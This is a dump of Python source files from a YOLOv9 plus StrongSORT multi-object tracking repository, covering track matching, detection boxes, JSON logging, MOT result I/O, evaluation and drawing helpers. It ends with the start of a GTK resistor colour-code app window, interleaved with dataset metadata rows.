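#         track_indices=[0, 1], detection_indices=[0, 1, 2])
#
# Pairs whose cost exceeds max_distance are never returned as matches; their
# indices fall back into the unmatched lists.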
def matching_cascade(
distance_metric, max_distance, cascade_depth, tracks, detections,
track_indices=None, detection_indices=None):
"""Run matching cascade.
Parameters
----------
    distance_metric : Callable[List[Track], List[Detection], List[int], List[int]] -> ndarray
The distance metric is given a list of tracks and detections as well as
a list of N track indices and M detection indices. The metric should
return the NxM dimensional cost matrix, where element (i, j) is the
association cost between the i-th track in the given track indices and
the j-th detection in the given detection indices.
max_distance : float
Gating threshold. Associations with cost larger than this value are
disregarded.
cascade_depth: int
        The cascade depth, should be set to the maximum track age.
tracks : List[track.Track]
A list of predicted tracks at the current time step.
detections : List[detection.Detection]
A list of detections at the current time step.
track_indices : Optional[List[int]]
List of track indices that maps rows in `cost_matrix` to tracks in
`tracks` (see description above). Defaults to all tracks.
detection_indices : Optional[List[int]]
List of detection indices that maps columns in `cost_matrix` to
detections in `detections` (see description above). Defaults to all
detections.
Returns
-------
(List[(int, int)], List[int], List[int])
Returns a tuple with the following three entries:
* A list of matched track and detection indices.
* A list of unmatched track indices.
* A list of unmatched detection indices.
"""
if track_indices is None:
track_indices = list(range(len(tracks)))
if detection_indices is None:
detection_indices = list(range(len(detections)))
unmatched_detections = detection_indices
matches = []
track_indices_l = [
k for k in track_indices
# if tracks[k].time_since_update == 1 + level
]
matches_l, _, unmatched_detections = \
min_cost_matching(
distance_metric, max_distance, tracks, detections,
track_indices_l, unmatched_detections)
matches += matches_l
unmatched_tracks = list(set(track_indices) - set(k for k, _ in matches))
return matches, unmatched_tracks, unmatched_detections
def gate_cost_matrix(
cost_matrix, tracks, detections, track_indices, detection_indices,
gated_cost=INFTY_COST, only_position=False):
"""Invalidate infeasible entries in cost matrix based on the state
distributions obtained by Kalman filtering.
Parameters
----------
cost_matrix : ndarray
The NxM dimensional cost matrix, where N is the number of track indices
and M is the number of detection indices, such that entry (i, j) is the
association cost between `tracks[track_indices[i]]` and
`detections[detection_indices[j]]`.
tracks : List[track.Track]
A list of predicted tracks at the current time step.
detections : List[detection.Detection]
A list of detections at the current time step.
track_indices : List[int]
List of track indices that maps rows in `cost_matrix` to tracks in
`tracks` (see description above).
detection_indices : List[int]
List of detection indices that maps columns in `cost_matrix` to
detections in `detections` (see description above).
gated_cost : Optional[float]
Entries in the cost matrix corresponding to infeasible associations are
set this value. Defaults to a very large value.
only_position : Optional[bool]
If True, only the x, y position of the state distribution is considered
during gating. Defaults to False.
Returns
-------
ndarray
Returns the modified cost matrix.
"""
gating_dim = 2 if only_position else 4
gating_threshold = kalman_filter.chi2inv95[gating_dim]
measurements = np.asarray(
[detections[i].to_xyah() for i in detection_indices])
for row, track_idx in enumerate(track_indices):
track = tracks[track_idx]
gating_distance = track.kf.gating_distance(track.mean, track.covariance, measurements, only_position)
cost_matrix[row, gating_distance > gating_threshold] = gated_cost
cost_matrix[row] = 0.995 * cost_matrix[row] + (1 - 0.995) * gating_distance
return cost_matrix | 7,624 | Python | .py | 162 | 39.969136 | 109 | 0.684606 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,120 | detection.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/detection.py | # vim: expandtab:ts=4:sw=4
import numpy as np
class Detection(object):
"""
This class represents a bounding box detection in a single image.
Parameters
----------
tlwh : array_like
Bounding box in format `(x, y, w, h)`.
confidence : float
Detector confidence score.
feature : array_like
A feature vector that describes the object contained in this image.
Attributes
----------
tlwh : ndarray
Bounding box in format `(top left x, top left y, width, height)`.
confidence : ndarray
Detector confidence score.
feature : ndarray | NoneType
A feature vector that describes the object contained in this image.
"""
def __init__(self, tlwh, confidence, feature):
self.tlwh = np.asarray(tlwh, dtype=np.float32)
self.confidence = float(confidence)
self.feature = np.asarray(feature.cpu(), dtype=np.float32)
def to_tlbr(self):
"""Convert bounding box to format `(min x, min y, max x, max y)`, i.e.,
`(top left, bottom right)`.
"""
ret = self.tlwh.copy()
ret[2:] += ret[:2]
return ret
def to_xyah(self):
"""Convert bounding box to format `(center x, center y, aspect ratio,
height)`, where the aspect ratio is `width / height`.
"""
ret = self.tlwh.copy()
ret[:2] += ret[2:] / 2
ret[2] /= ret[3]
return ret
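    # Worked example (editor's note): for a detection whose tlwh is (40., 35., 20., 10.),
    # to_tlbr() gives [40., 35., 60., 45.] and to_xyah() gives [50., 40., 2., 10.]
    # (center x, center y, aspect ratio w/h, height).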
| 1,441 | Python | .py | 41 | 28.097561 | 79 | 0.602011 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,121 | json_logger.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/json_logger.py | """
References:
https://medium.com/analytics-vidhya/creating-a-custom-logging-mechanism-for-real-time-object-detection-using-tdd-4ca2cfcd0a2f
"""
import json
from os import makedirs
from os.path import exists, join
from datetime import datetime
class JsonMeta(object):
HOURS = 3
MINUTES = 59
SECONDS = 59
PATH_TO_SAVE = 'LOGS'
DEFAULT_FILE_NAME = 'remaining'
class BaseJsonLogger(object):
"""
This is the base class that returns __dict__ of its own
it also returns the dicts of objects in the attributes that are list instances
"""
def dic(self):
# returns dicts of objects
out = {}
for k, v in self.__dict__.items():
if hasattr(v, 'dic'):
out[k] = v.dic()
elif isinstance(v, list):
out[k] = self.list(v)
else:
out[k] = v
return out
@staticmethod
def list(values):
# applies the dic method on items in the list
return [v.dic() if hasattr(v, 'dic') else v for v in values]
class Label(BaseJsonLogger):
"""
For each bounding box there are various categories with confidences. Label class keeps track of that information.
"""
def __init__(self, category: str, confidence: float):
self.category = category
self.confidence = confidence
class Bbox(BaseJsonLogger):
"""
This module stores the information for each frame and use them in JsonParser
Attributes:
labels (list): List of label module.
top (int):
left (int):
width (int):
height (int):
Args:
bbox_id (float):
top (int):
left (int):
width (int):
height (int):
References:
Check Label module for better understanding.
"""
def __init__(self, bbox_id, top, left, width, height):
self.labels = []
self.bbox_id = bbox_id
self.top = top
self.left = left
self.width = width
self.height = height
def add_label(self, category, confidence):
# adds category and confidence only if top_k is not exceeded.
self.labels.append(Label(category, confidence))
def labels_full(self, value):
return len(self.labels) == value
class Frame(BaseJsonLogger):
"""
This module stores the information for each frame and use them in JsonParser
Attributes:
timestamp (float): The elapsed time of captured frame
frame_id (int): The frame number of the captured video
bboxes (list of Bbox objects): Stores the list of bbox objects.
References:
Check Bbox class for better information
Args:
timestamp (float):
frame_id (int):
"""
def __init__(self, frame_id: int, timestamp: float = None):
self.frame_id = frame_id
self.timestamp = timestamp
self.bboxes = []
def add_bbox(self, bbox_id: int, top: int, left: int, width: int, height: int):
bboxes_ids = [bbox.bbox_id for bbox in self.bboxes]
if bbox_id not in bboxes_ids:
self.bboxes.append(Bbox(bbox_id, top, left, width, height))
else:
raise ValueError("Frame with id: {} already has a Bbox with id: {}".format(self.frame_id, bbox_id))
def add_label_to_bbox(self, bbox_id: int, category: str, confidence: float):
        bboxes = {bbox.bbox_id: bbox for bbox in self.bboxes}
        if bbox_id in bboxes.keys():
            res = bboxes.get(bbox_id)
            res.add_label(category, confidence)
        else:
            raise ValueError('the bbox with id: {} does not exist!'.format(bbox_id))
class BboxToJsonLogger(BaseJsonLogger):
"""
    This module is designed to automate the task of logging jsons. An example json is used
to show the contents of json file shortly
Example:
{
"video_details": {
"frame_width": 1920,
"frame_height": 1080,
"frame_rate": 20,
"video_name": "/home/gpu/codes/MSD/pedestrian_2/project/public/camera1.avi"
},
"frames": [
{
"frame_id": 329,
"timestamp": 3365.1254
"bboxes": [
{
"labels": [
{
"category": "pedestrian",
"confidence": 0.9
}
],
"bbox_id": 0,
"top": 1257,
"left": 138,
"width": 68,
"height": 109
}
]
}],
Attributes:
frames (dict): It's a dictionary that maps each frame_id to json attributes.
video_details (dict): information about video file.
top_k_labels (int): shows the allowed number of labels
start_time (datetime object): we use it to automate the json output by time.
Args:
top_k_labels (int): shows the allowed number of labels
"""
def __init__(self, top_k_labels: int = 1):
self.frames = {}
        self.video_details = dict(frame_width=None, frame_height=None, frame_rate=None,
                                  video_name=None)
self.top_k_labels = top_k_labels
self.start_time = datetime.now()
def set_top_k(self, value):
self.top_k_labels = value
def frame_exists(self, frame_id: int) -> bool:
"""
Args:
frame_id (int):
Returns:
bool: true if frame_id is recognized
"""
return frame_id in self.frames.keys()
def add_frame(self, frame_id: int, timestamp: float = None) -> None:
"""
Args:
frame_id (int):
timestamp (float): opencv captured frame time property
Raises:
ValueError: if frame_id would not exist in class frames attribute
Returns:
None
"""
if not self.frame_exists(frame_id):
self.frames[frame_id] = Frame(frame_id, timestamp)
else:
raise ValueError("Frame id: {} already exists".format(frame_id))
def bbox_exists(self, frame_id: int, bbox_id: int) -> bool:
"""
Args:
frame_id:
bbox_id:
Returns:
bool: if bbox exists in frame bboxes list
"""
bboxes = []
if self.frame_exists(frame_id=frame_id):
bboxes = [bbox.bbox_id for bbox in self.frames[frame_id].bboxes]
return bbox_id in bboxes
def find_bbox(self, frame_id: int, bbox_id: int):
"""
Args:
frame_id:
bbox_id:
Returns:
bbox_id (int):
Raises:
ValueError: if bbox_id does not exist in the bbox list of specific frame.
"""
if not self.bbox_exists(frame_id, bbox_id):
raise ValueError("frame with id: {} does not contain bbox with id: {}".format(frame_id, bbox_id))
bboxes = {bbox.bbox_id: bbox for bbox in self.frames[frame_id].bboxes}
return bboxes.get(bbox_id)
def add_bbox_to_frame(self, frame_id: int, bbox_id: int, top: int, left: int, width: int, height: int) -> None:
"""
Args:
frame_id (int):
bbox_id (int):
top (int):
left (int):
width (int):
height (int):
Returns:
None
Raises:
ValueError: if bbox_id already exist in frame information with frame_id
ValueError: if frame_id does not exist in frames attribute
"""
if self.frame_exists(frame_id):
frame = self.frames[frame_id]
if not self.bbox_exists(frame_id, bbox_id):
frame.add_bbox(bbox_id, top, left, width, height)
else:
raise ValueError(
"frame with frame_id: {} already contains the bbox with id: {} ".format(frame_id, bbox_id))
else:
raise ValueError("frame with frame_id: {} does not exist".format(frame_id))
def add_label_to_bbox(self, frame_id: int, bbox_id: int, category: str, confidence: float):
"""
Args:
frame_id:
bbox_id:
category:
confidence: the confidence value returned from yolo detection
Returns:
None
Raises:
ValueError: if labels quota (top_k_labels) exceeds.
"""
bbox = self.find_bbox(frame_id, bbox_id)
if not bbox.labels_full(self.top_k_labels):
bbox.add_label(category, confidence)
else:
raise ValueError("labels in frame_id: {}, bbox_id: {} is fulled".format(frame_id, bbox_id))
def add_video_details(self, frame_width: int = None, frame_height: int = None, frame_rate: int = None,
video_name: str = None):
self.video_details['frame_width'] = frame_width
self.video_details['frame_height'] = frame_height
self.video_details['frame_rate'] = frame_rate
self.video_details['video_name'] = video_name
def output(self):
output = {'video_details': self.video_details}
result = list(self.frames.values())
output['frames'] = [item.dic() for item in result]
return output
def json_output(self, output_name):
"""
Args:
output_name:
Returns:
None
Notes:
It creates the json output with `output_name` name.
"""
if not output_name.endswith('.json'):
output_name += '.json'
with open(output_name, 'w') as file:
json.dump(self.output(), file)
file.close()
def set_start(self):
self.start_time = datetime.now()
def schedule_output_by_time(self, output_dir=JsonMeta.PATH_TO_SAVE, hours: int = 0, minutes: int = 0,
seconds: int = 60) -> None:
"""
Notes:
Creates folder and then periodically stores the jsons on that address.
Args:
output_dir (str): the directory where output files will be stored
hours (int):
minutes (int):
seconds (int):
Returns:
None
"""
end = datetime.now()
interval = 0
interval += abs(min([hours, JsonMeta.HOURS]) * 3600)
interval += abs(min([minutes, JsonMeta.MINUTES]) * 60)
interval += abs(min([seconds, JsonMeta.SECONDS]))
diff = (end - self.start_time).seconds
if diff > interval:
output_name = self.start_time.strftime('%Y-%m-%d %H-%M-%S') + '.json'
if not exists(output_dir):
makedirs(output_dir)
output = join(output_dir, output_name)
self.json_output(output_name=output)
self.frames = {}
self.start_time = datetime.now()
def schedule_output_by_frames(self, frames_quota, frame_counter, output_dir=JsonMeta.PATH_TO_SAVE):
"""
saves as the number of frames quota increases higher.
:param frames_quota:
:param frame_counter:
:param output_dir:
:return:
"""
pass
def flush(self, output_dir):
"""
Notes:
We use this function to output jsons whenever possible.
like the time that we exit the while loop of opencv.
Args:
output_dir:
Returns:
None
"""
filename = self.start_time.strftime('%Y-%m-%d %H-%M-%S') + '-remaining.json'
output = join(output_dir, filename)
self.json_output(output_name=output)
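# Editor's usage sketch (values are illustrative only):
#
#     logger = BboxToJsonLogger(top_k_labels=1)
#     logger.add_video_details(1920, 1080, 20, 'camera1.avi')
#     logger.add_frame(frame_id=0, timestamp=0.0)
#     logger.add_bbox_to_frame(0, bbox_id=7, top=138, left=1257, width=68, height=109)
#     logger.add_label_to_bbox(0, 7, 'pedestrian', 0.9)
#     logger.json_output('tracking_log')        # writes tracking_log.json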
| 11,762 | Python | .py | 314 | 27.347134 | 129 | 0.563846 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,122 | io.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/io.py | import os
from typing import Dict
import numpy as np
# from utils.log import get_logger
def write_results(filename, results, data_type):
if data_type == 'mot':
save_format = '{frame},{id},{x1},{y1},{w},{h},-1,-1,-1,-1\n'
elif data_type == 'kitti':
save_format = '{frame} {id} pedestrian 0 0 -10 {x1} {y1} {x2} {y2} -10 -10 -10 -1000 -1000 -1000 -10\n'
else:
raise ValueError(data_type)
with open(filename, 'w') as f:
for frame_id, tlwhs, track_ids in results:
if data_type == 'kitti':
frame_id -= 1
for tlwh, track_id in zip(tlwhs, track_ids):
if track_id < 0:
continue
x1, y1, w, h = tlwh
x2, y2 = x1 + w, y1 + h
line = save_format.format(frame=frame_id, id=track_id, x1=x1, y1=y1, x2=x2, y2=y2, w=w, h=h)
f.write(line)
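# Editor's note: with data_type == 'mot' every written line follows the MOTChallenge
# text format, e.g. (illustrative values)
#
#     1,3,794.2,247.5,71.2,174.8,-1,-1,-1,-1
#
# i.e. frame, track id, bbox left, bbox top, width, height, then four ignored fields.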
# def write_results(filename, results_dict: Dict, data_type: str):
# if not filename:
# return
# path = os.path.dirname(filename)
# if not os.path.exists(path):
# os.makedirs(path)
# if data_type in ('mot', 'mcmot', 'lab'):
# save_format = '{frame},{id},{x1},{y1},{w},{h},1,-1,-1,-1\n'
# elif data_type == 'kitti':
# save_format = '{frame} {id} pedestrian -1 -1 -10 {x1} {y1} {x2} {y2} -1 -1 -1 -1000 -1000 -1000 -10 {score}\n'
# else:
# raise ValueError(data_type)
# with open(filename, 'w') as f:
# for frame_id, frame_data in results_dict.items():
# if data_type == 'kitti':
# frame_id -= 1
# for tlwh, track_id in frame_data:
# if track_id < 0:
# continue
# x1, y1, w, h = tlwh
# x2, y2 = x1 + w, y1 + h
# line = save_format.format(frame=frame_id, id=track_id, x1=x1, y1=y1, x2=x2, y2=y2, w=w, h=h, score=1.0)
# f.write(line)
# logger.info('Save results to {}'.format(filename))
def read_results(filename, data_type: str, is_gt=False, is_ignore=False):
if data_type in ('mot', 'lab'):
read_fun = read_mot_results
else:
raise ValueError('Unknown data type: {}'.format(data_type))
return read_fun(filename, is_gt, is_ignore)
"""
labels={'ped', ... % 1
'person_on_vhcl', ... % 2
'car', ... % 3
'bicycle', ... % 4
'mbike', ... % 5
'non_mot_vhcl', ... % 6
'static_person', ... % 7
'distractor', ... % 8
'occluder', ... % 9
'occluder_on_grnd', ... %10
'occluder_full', ... % 11
'reflection', ... % 12
'crowd' ... % 13
};
"""
def read_mot_results(filename, is_gt, is_ignore):
valid_labels = {1}
ignore_labels = {2, 7, 8, 12}
results_dict = dict()
if os.path.isfile(filename):
with open(filename, 'r') as f:
for line in f.readlines():
linelist = line.split(',')
if len(linelist) < 7:
continue
fid = int(linelist[0])
if fid < 1:
continue
results_dict.setdefault(fid, list())
if is_gt:
if 'MOT16-' in filename or 'MOT17-' in filename:
label = int(float(linelist[7]))
mark = int(float(linelist[6]))
if mark == 0 or label not in valid_labels:
continue
score = 1
elif is_ignore:
if 'MOT16-' in filename or 'MOT17-' in filename:
label = int(float(linelist[7]))
vis_ratio = float(linelist[8])
if label not in ignore_labels and vis_ratio >= 0:
continue
else:
continue
score = 1
else:
score = float(linelist[6])
tlwh = tuple(map(float, linelist[2:6]))
target_id = int(linelist[1])
results_dict[fid].append((tlwh, target_id, score))
return results_dict
def unzip_objs(objs):
if len(objs) > 0:
tlwhs, ids, scores = zip(*objs)
else:
tlwhs, ids, scores = [], [], []
tlwhs = np.asarray(tlwhs, dtype=float).reshape(-1, 4)
return tlwhs, ids, scores | 4,357 | Python | .py | 111 | 30.423423 | 121 | 0.493491 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,123 | evaluation.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/evaluation.py | import os
import numpy as np
import copy
import motmetrics as mm
mm.lap.default_solver = 'lap'
from utils.io import read_results, unzip_objs
class Evaluator(object):
def __init__(self, data_root, seq_name, data_type):
self.data_root = data_root
self.seq_name = seq_name
self.data_type = data_type
self.load_annotations()
self.reset_accumulator()
def load_annotations(self):
assert self.data_type == 'mot'
gt_filename = os.path.join(self.data_root, self.seq_name, 'gt', 'gt.txt')
self.gt_frame_dict = read_results(gt_filename, self.data_type, is_gt=True)
self.gt_ignore_frame_dict = read_results(gt_filename, self.data_type, is_ignore=True)
def reset_accumulator(self):
self.acc = mm.MOTAccumulator(auto_id=True)
def eval_frame(self, frame_id, trk_tlwhs, trk_ids, rtn_events=False):
# results
trk_tlwhs = np.copy(trk_tlwhs)
trk_ids = np.copy(trk_ids)
# gts
gt_objs = self.gt_frame_dict.get(frame_id, [])
gt_tlwhs, gt_ids = unzip_objs(gt_objs)[:2]
# ignore boxes
ignore_objs = self.gt_ignore_frame_dict.get(frame_id, [])
ignore_tlwhs = unzip_objs(ignore_objs)[0]
# remove ignored results
keep = np.ones(len(trk_tlwhs), dtype=bool)
iou_distance = mm.distances.iou_matrix(ignore_tlwhs, trk_tlwhs, max_iou=0.5)
if len(iou_distance) > 0:
match_is, match_js = mm.lap.linear_sum_assignment(iou_distance)
match_is, match_js = map(lambda a: np.asarray(a, dtype=int), [match_is, match_js])
match_ious = iou_distance[match_is, match_js]
match_js = np.asarray(match_js, dtype=int)
match_js = match_js[np.logical_not(np.isnan(match_ious))]
keep[match_js] = False
trk_tlwhs = trk_tlwhs[keep]
trk_ids = trk_ids[keep]
# get distance matrix
iou_distance = mm.distances.iou_matrix(gt_tlwhs, trk_tlwhs, max_iou=0.5)
# acc
self.acc.update(gt_ids, trk_ids, iou_distance)
if rtn_events and iou_distance.size > 0 and hasattr(self.acc, 'last_mot_events'):
events = self.acc.last_mot_events # only supported by https://github.com/longcw/py-motmetrics
else:
events = None
return events
def eval_file(self, filename):
self.reset_accumulator()
result_frame_dict = read_results(filename, self.data_type, is_gt=False)
frames = sorted(list(set(self.gt_frame_dict.keys()) | set(result_frame_dict.keys())))
for frame_id in frames:
trk_objs = result_frame_dict.get(frame_id, [])
trk_tlwhs, trk_ids = unzip_objs(trk_objs)[:2]
self.eval_frame(frame_id, trk_tlwhs, trk_ids, rtn_events=False)
return self.acc
@staticmethod
def get_summary(accs, names, metrics=('mota', 'num_switches', 'idp', 'idr', 'idf1', 'precision', 'recall')):
names = copy.deepcopy(names)
if metrics is None:
metrics = mm.metrics.motchallenge_metrics
metrics = copy.deepcopy(metrics)
mh = mm.metrics.create()
summary = mh.compute_many(
accs,
metrics=metrics,
names=names,
generate_overall=True
)
return summary
@staticmethod
def save_summary(summary, filename):
import pandas as pd
writer = pd.ExcelWriter(filename)
summary.to_excel(writer)
writer.save()
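# Illustrative usage sketch; the data root, sequence name and result file are
# hypothetical:
#
#   evaluator = Evaluator('/data/MOT16/train', 'MOT16-02', 'mot')
#   acc = evaluator.eval_file('/results/MOT16-02.txt')
#   summary = Evaluator.get_summary([acc], ['MOT16-02'])
#   Evaluator.save_summary(summary, 'summary.xlsx')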
| 3,532 | Python | .py | 80 | 35.1125 | 112 | 0.619131 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,124 | draw.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/draw.py | import numpy as np
import cv2
palette = (2 ** 11 - 1, 2 ** 15 - 1, 2 ** 20 - 1)
def compute_color_for_labels(label):
"""
    Simple function that returns a fixed color depending on the class label
"""
color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]
return tuple(color)
def draw_boxes(img, bbox, identities=None, offset=(0,0)):
    for i, box in enumerate(bbox):
        x1, y1, x2, y2 = [int(coord) for coord in box]
x1 += offset[0]
x2 += offset[0]
y1 += offset[1]
y2 += offset[1]
# box text and bar
id = int(identities[i]) if identities is not None else 0
color = compute_color_for_labels(id)
label = '{}{:d}'.format("", id)
t_size = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 2 , 2)[0]
cv2.rectangle(img,(x1, y1),(x2,y2),color,3)
cv2.rectangle(img,(x1, y1),(x1+t_size[0]+3,y1+t_size[1]+4), color,-1)
cv2.putText(img,label,(x1,y1+t_size[1]+4), cv2.FONT_HERSHEY_PLAIN, 2, [255,255,255], 2)
return img
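# Illustrative usage sketch; the frame and tracker outputs are hypothetical:
#
#   frame = cv2.imread('frame.jpg')
#   boxes = [[50, 60, 150, 220]]   # x1, y1, x2, y2
#   frame = draw_boxes(frame, boxes, identities=[7])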
if __name__ == '__main__':
for i in range(82):
print(compute_color_for_labels(i))
| 1,125 | Python | .py | 28 | 33.607143 | 95 | 0.577594 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,125 | asserts.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/asserts.py | from os import environ
def assert_in(file, files_to_check):
if file not in files_to_check:
raise AssertionError("{} does not exist in the list".format(str(file)))
return True
def assert_in_env(check_list: list):
for item in check_list:
assert_in(item, environ.keys())
return True
| 316 | Python | .py | 9 | 30.111111 | 79 | 0.693069 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,126 | log.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/log.py | import logging
def get_logger(name='root'):
formatter = logging.Formatter(
# fmt='%(asctime)s [%(levelname)s]: %(filename)s(%(funcName)s:%(lineno)s) >> %(message)s')
fmt='%(asctime)s [%(levelname)s]: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
handler = logging.StreamHandler()
handler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.setLevel(logging.INFO)
logger.addHandler(handler)
return logger
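# Illustrative usage sketch:
#
#   logger = get_logger('tracker')
#   logger.info('tracker initialized')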
| 463 | Python | .py | 11 | 36.545455 | 98 | 0.661435 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,127 | tools.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/tools.py | from functools import wraps
from time import time
def is_video(ext: str):
"""
Returns true if ext exists in
allowed_exts for video files.
Args:
ext:
Returns:
"""
allowed_exts = ('.mp4', '.webm', '.ogg', '.avi', '.wmv', '.mkv', '.3gp')
return any((ext.endswith(x) for x in allowed_exts))
def tik_tok(func):
"""
keep track of time for each process.
Args:
func:
Returns:
"""
@wraps(func)
def _time_it(*args, **kwargs):
start = time()
try:
return func(*args, **kwargs)
finally:
end_ = time()
print("time: {:.03f}s, fps: {:.03f}".format(end_ - start, 1 / (end_ - start)))
return _time_it
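# Illustrative usage sketch; the decorated function is hypothetical:
#
#   @tik_tok
#   def detect(frame):
#       ...
#
# Each call to detect() then prints its elapsed time and the equivalent FPS.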
| 734 | Python | .py | 28 | 19.821429 | 90 | 0.541007 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,128 | parser.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/parser.py | import os
import yaml
from easydict import EasyDict as edict
class YamlParser(edict):
"""
    This is a YAML parser based on EasyDict.
"""
def __init__(self, cfg_dict=None, config_file=None):
if cfg_dict is None:
cfg_dict = {}
if config_file is not None:
assert(os.path.isfile(config_file))
with open(config_file, 'r') as fo:
yaml_ = yaml.load(fo.read(), Loader=yaml.FullLoader)
cfg_dict.update(yaml_)
super(YamlParser, self).__init__(cfg_dict)
def merge_from_file(self, config_file):
with open(config_file, 'r') as fo:
yaml_ = yaml.load(fo.read(), Loader=yaml.FullLoader)
self.update(yaml_)
def merge_from_dict(self, config_dict):
self.update(config_dict)
def get_config(config_file=None):
return YamlParser(config_file=config_file)
if __name__ == "__main__":
cfg = YamlParser(config_file="../configs/yolov3.yaml")
cfg.merge_from_file("../configs/strong_sort.yaml")
import ipdb
ipdb.set_trace()
| 1,078 | Python | .py | 29 | 29.689655 | 68 | 0.620058 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,129 | window.py | oyajun_color-code/src/window.py | # window.py
#
# Copyright 2024 oyajun
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# SPDX-License-Identifier: GPL-3.0-or-later
from gi.repository import Adw, Gtk, Gdk, Gio, GObject
import decimal
@Gtk.Template(resource_path='/com/oyajun/ColorCode/window.ui')
class ColorCodeWindow(Adw.ApplicationWindow):
__gtype_name__ = 'ColorCodeWindow'
drop_down_1 = Gtk.Template.Child()
drop_down_2 = Gtk.Template.Child()
drop_down_3 = Gtk.Template.Child()
drop_down_4 = Gtk.Template.Child()
result_label = Gtk.Template.Child()
copy_button = Gtk.Template.Child()
clipboard = Gdk.Display.get_default().get_clipboard()
def __init__(self, **kwargs):
super().__init__(**kwargs)
list_store_expression = Gtk.PropertyExpression.new(
KeyValuePair,
None,
'value',
)
value_model = Gio.ListStore(item_type=KeyValuePair)
value_model.splice(
0, 0,
[
KeyValuePair(key='0', value=_('⬛ Black')),
KeyValuePair(key='1', value=_('🟫 Brown')),
KeyValuePair(key='2', value=_('🟥 Red')),
KeyValuePair(key='3', value=_('🟧 Orange')),
KeyValuePair(key='4', value=_('🟨 Yellow')),
KeyValuePair(key='5', value=_('🟩 Green')),
KeyValuePair(key='6', value=_('🟦 Blue')),
KeyValuePair(key='7', value=_('🟪 Violet')),
KeyValuePair(key='8', value=_('🩶 Gray')),
KeyValuePair(key='9', value=_('⬜ White')),
],
)
multiplier_model = Gio.ListStore(item_type=KeyValuePair)
multiplier_model.splice(
0, 0,
[
KeyValuePair(key='0', value=_('⬛ Black')),
KeyValuePair(key='1', value=_('🟫 Brown')),
KeyValuePair(key='2', value=_('🟥 Red')),
KeyValuePair(key='3', value=_('🟧 Orange')),
KeyValuePair(key='4', value=_('🟨 Yellow')),
KeyValuePair(key='5', value=_('🟩 Green')),
KeyValuePair(key='6', value=_('🟦 Blue')),
KeyValuePair(key='7', value=_('🟪 Violet')),
KeyValuePair(key='8', value=_('🩶 Gray')),
KeyValuePair(key='9', value=_('⬜ White')),
KeyValuePair(key='-1', value=_('🥇 Gold')),
KeyValuePair(key='-2', value=_('🥈 Silver')),
KeyValuePair(key='-3', value=_('🩷 Pink')),
],
)
tolerance_model = Gio.ListStore(item_type=KeyValuePair)
tolerance_model.splice(
0, 0,
[
KeyValuePair(key='1', value=_('🟫 Brown')),
KeyValuePair(key='2', value=_('🟥 Red')),
KeyValuePair(key='0.05', value=_('🟧 Orange')),
KeyValuePair(key='0.5', value=_('🟩 Green')),
KeyValuePair(key='0.25', value=_('🟦 Blue')),
KeyValuePair(key='0.1', value=_('🟪 Violet')),
KeyValuePair(key='5', value=_('🥇 Gold')),
KeyValuePair(key='10', value=_('🥈 Silver')),
],
)
self.drop_down_1.set_expression(list_store_expression)
self.drop_down_2.set_expression(list_store_expression)
self.drop_down_3.set_expression(list_store_expression)
self.drop_down_4.set_expression(list_store_expression)
self.drop_down_1.set_model(value_model)
self.drop_down_2.set_model(value_model)
self.drop_down_3.set_model(multiplier_model)
self.drop_down_4.set_model(tolerance_model)
self.drop_down_1.connect('notify::selected-item', self.on_selected_item)
self.drop_down_2.connect('notify::selected-item', self.on_selected_item)
self.drop_down_3.connect('notify::selected-item', self.on_selected_item)
self.drop_down_4.connect('notify::selected-item', self.on_selected_item)
# init
self.drop_down_1.set_selected(1)
self.drop_down_2.set_selected(0)
self.drop_down_3.set_selected(2)
